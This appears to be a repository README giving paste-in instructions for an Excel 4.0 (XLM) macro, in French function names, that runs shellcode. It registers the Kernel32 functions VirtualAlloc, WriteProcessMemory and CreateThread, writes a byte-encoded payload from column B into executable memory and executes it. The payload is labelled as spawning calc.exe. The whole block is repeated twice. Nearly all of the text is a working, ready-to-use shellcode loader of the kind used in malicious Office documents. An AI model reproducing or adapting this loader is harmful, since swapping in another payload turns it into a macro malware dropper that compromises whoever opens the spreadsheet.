FlatL1neAPT/shellcode.xlsm

## shellcode.xlsm
Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

================================================================================
Paste this in cells in column A, starting in cell A1:
================================================================================

=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
=SELECTIONNER(B1:B50;B1)
=POSER.VALEUR(C1;0)
=TANT.QUE(CELLULE.ACTIVE()<>"END")
=POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
=WProcessMemory(-1; A4 + (C1 * 20); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
=POSER.VALEUR(C1; C1 +1)
=SELECTIONNER(;"L(1)C")
=SUIVANT()
=CThread(0;0;A4;0;0;0)
=ARRETER()

================================================================================
Paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
================================================================================

=CAR(218)&CAR(209)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(189)&CAR(104)&CAR(130)&CAR(15)&CAR(220)&CAR(94)&CAR(41)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(238)&CAR(252)&CAR(49)
=CAR(110)&CAR(20)&CAR(3)&CAR(110)&CAR(124)&CAR(96)&CAR(250)&CAR(32)&CAR(148)&CAR(230)&CAR(5)&CAR(217)&CAR(100)&CAR(135)&CAR(140)&CAR(60)&CAR(85)&CAR(135)&CAR(235)&CAR(53)
=CAR(197)&CAR(55)&CAR(127)&CAR(27)&CAR(233)&CAR(188)&CAR(45)&CAR(136)&CAR(122)&CAR(176)&CAR(249)&CAR(191)&CAR(203)&CAR(127)&CAR(220)&CAR(142)&CAR(204)&CAR(44)&CAR(28)&CAR(144)
=CAR(78)&CAR(47)&CAR(113)&CAR(114)&CAR(111)&CAR(224)&CAR(132)&CAR(115)&CAR(168)&CAR(29)&CAR(100)&CAR(33)&CAR(97)&CAR(105)&CAR(219)&CAR(214)&CAR(6)&CAR(39)&CAR(224)&CAR(93)
=CAR(84)&CAR(169)&CAR(96)&CAR(129)&CAR(44)&CAR(200)&CAR(65)&CAR(20)&CAR(39)&CAR(147)&CAR(65)&CAR(150)&CAR(228)&CAR(175)&CAR(203)&CAR(128)&CAR(233)&CAR(138)&CAR(130)&CAR(59)
=CAR(217)&CAR(97)&CAR(21)&CAR(234)&CAR(16)&CAR(137)&CAR(186)&CAR(211)&CAR(157)&CAR(120)&CAR(194)&CAR(20)&CAR(25)&CAR(99)&CAR(177)&CAR(108)&CAR(90)&CAR(30)&CAR(194)&CAR(170)
=CAR(33)&CAR(196)&CAR(71)&CAR(41)&CAR(129)&CAR(143)&CAR(240)&CAR(149)&CAR(48)&CAR(67)&CAR(102)&CAR(93)&CAR(62)&CAR(40)&CAR(236)&CAR(57)&CAR(34)&CAR(175)&CAR(33)&CAR(50)
=CAR(94)&CAR(36)&CAR(196)&CAR(149)&CAR(215)&CAR(126)&CAR(227)&CAR(49)&CAR(188)&CAR(37)&CAR(138)&CAR(96)&CAR(24)&CAR(139)&CAR(179)&CAR(115)&CAR(195)&CAR(116)&CAR(22)&CAR(255)
=CAR(233)&CAR(97)&CAR(43)&CAR(162)&CAR(103)&CAR(119)&CAR(185)&CAR(216)&CAR(197)&CAR(119)&CAR(193)&CAR(226)&CAR(121)&CAR(16)&CAR(240)&CAR(105)&CAR(22)&CAR(103)&CAR(13)&CAR(184)
=CAR(83)&CAR(151)&CAR(71)&CAR(225)&CAR(245)&CAR(48)&CAR(14)&CAR(115)&CAR(68)&CAR(93)&CAR(177)&CAR(169)&CAR(138)&CAR(88)&CAR(50)&CAR(88)&CAR(114)&CAR(159)&CAR(42)&CAR(41)
=CAR(119)&CAR(219)&CAR(236)&CAR(193)&CAR(5)&CAR(116)&CAR(153)&CAR(229)&CAR(186)&CAR(117)&CAR(136)&CAR(133)&CAR(93)&CAR(230)&CAR(80)&CAR(100)&CAR(248)&CAR(142)&CAR(243)&CAR(120)
END
	Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

	================================================================================
	Paste this in cells in column A, starting in cell A1:
	================================================================================

	=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
	=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
	=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
	=VAlloc(0;4096;4096;64)
	=SELECTIONNER(B1:B50;B1)
	=POSER.VALEUR(C1;0)
	=TANT.QUE(CELLULE.ACTIVE()<>"END")
	=POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
	=WProcessMemory(-1; A4 + (C1 * 20); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
	=POSER.VALEUR(C1; C1 +1)
	=SELECTIONNER(;"L(1)C")
	=SUIVANT()
	=CThread(0;0;A4;0;0;0)
	=ARRETER()

	================================================================================
	Paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
	================================================================================

	=CAR(218)&CAR(209)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(189)&CAR(104)&CAR(130)&CAR(15)&CAR(220)&CAR(94)&CAR(41)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(238)&CAR(252)&CAR(49)
	=CAR(110)&CAR(20)&CAR(3)&CAR(110)&CAR(124)&CAR(96)&CAR(250)&CAR(32)&CAR(148)&CAR(230)&CAR(5)&CAR(217)&CAR(100)&CAR(135)&CAR(140)&CAR(60)&CAR(85)&CAR(135)&CAR(235)&CAR(53)
	=CAR(197)&CAR(55)&CAR(127)&CAR(27)&CAR(233)&CAR(188)&CAR(45)&CAR(136)&CAR(122)&CAR(176)&CAR(249)&CAR(191)&CAR(203)&CAR(127)&CAR(220)&CAR(142)&CAR(204)&CAR(44)&CAR(28)&CAR(144)
	=CAR(78)&CAR(47)&CAR(113)&CAR(114)&CAR(111)&CAR(224)&CAR(132)&CAR(115)&CAR(168)&CAR(29)&CAR(100)&CAR(33)&CAR(97)&CAR(105)&CAR(219)&CAR(214)&CAR(6)&CAR(39)&CAR(224)&CAR(93)
	=CAR(84)&CAR(169)&CAR(96)&CAR(129)&CAR(44)&CAR(200)&CAR(65)&CAR(20)&CAR(39)&CAR(147)&CAR(65)&CAR(150)&CAR(228)&CAR(175)&CAR(203)&CAR(128)&CAR(233)&CAR(138)&CAR(130)&CAR(59)
	=CAR(217)&CAR(97)&CAR(21)&CAR(234)&CAR(16)&CAR(137)&CAR(186)&CAR(211)&CAR(157)&CAR(120)&CAR(194)&CAR(20)&CAR(25)&CAR(99)&CAR(177)&CAR(108)&CAR(90)&CAR(30)&CAR(194)&CAR(170)
	=CAR(33)&CAR(196)&CAR(71)&CAR(41)&CAR(129)&CAR(143)&CAR(240)&CAR(149)&CAR(48)&CAR(67)&CAR(102)&CAR(93)&CAR(62)&CAR(40)&CAR(236)&CAR(57)&CAR(34)&CAR(175)&CAR(33)&CAR(50)
	=CAR(94)&CAR(36)&CAR(196)&CAR(149)&CAR(215)&CAR(126)&CAR(227)&CAR(49)&CAR(188)&CAR(37)&CAR(138)&CAR(96)&CAR(24)&CAR(139)&CAR(179)&CAR(115)&CAR(195)&CAR(116)&CAR(22)&CAR(255)
	=CAR(233)&CAR(97)&CAR(43)&CAR(162)&CAR(103)&CAR(119)&CAR(185)&CAR(216)&CAR(197)&CAR(119)&CAR(193)&CAR(226)&CAR(121)&CAR(16)&CAR(240)&CAR(105)&CAR(22)&CAR(103)&CAR(13)&CAR(184)
	=CAR(83)&CAR(151)&CAR(71)&CAR(225)&CAR(245)&CAR(48)&CAR(14)&CAR(115)&CAR(68)&CAR(93)&CAR(177)&CAR(169)&CAR(138)&CAR(88)&CAR(50)&CAR(88)&CAR(114)&CAR(159)&CAR(42)&CAR(41)
	=CAR(119)&CAR(219)&CAR(236)&CAR(193)&CAR(5)&CAR(116)&CAR(153)&CAR(229)&CAR(186)&CAR(117)&CAR(136)&CAR(133)&CAR(93)&CAR(230)&CAR(80)&CAR(100)&CAR(248)&CAR(142)&CAR(243)&CAR(120)
	END